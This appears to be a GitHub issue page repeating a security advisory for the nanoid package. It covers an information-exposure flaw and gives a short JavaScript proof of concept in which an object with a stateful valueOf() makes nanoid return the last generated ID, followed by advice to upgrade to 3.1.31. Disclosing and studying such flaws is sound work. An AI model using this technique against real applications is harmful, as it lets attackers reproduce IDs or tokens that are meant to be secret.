We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Affected versions of this package are vulnerable to Information Exposure via the valueOf() function which allows to reproduce the last id generated.
valueOf()
import { nanoid } from 'nanoid'; const makeProxyNumberToReproducePreviousID = () => { let step = 0; return { valueOf() { // // if (!pool || pool.length < bytes) { if (step === 0) { step++; return 0; } // } else if (poolOffset + bytes > pool.length) { if (step === 1) { step++; return -Infinity; } // poolOffset += bytes if (step === 2) { step++; return 0; } return 21; }, }; }; const ID1 = nanoid(); const ID2 = nanoid(makeProxyNumberToReproducePreviousID()); console.log({ ID1, ID2, isIDsEqual: ID1 === ID2 });
Upgrade nanoid to version 3.1.31 or higher.
nanoid
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Affecting Packages/Plugins
Overview
Affected versions of this package are vulnerable to Information Exposure via the
valueOf()
function which allows to reproduce the last id generated.PoC
Remediation
Upgrade
nanoid
to version 3.1.31 or higher.References
The text was updated successfully, but these errors were encountered: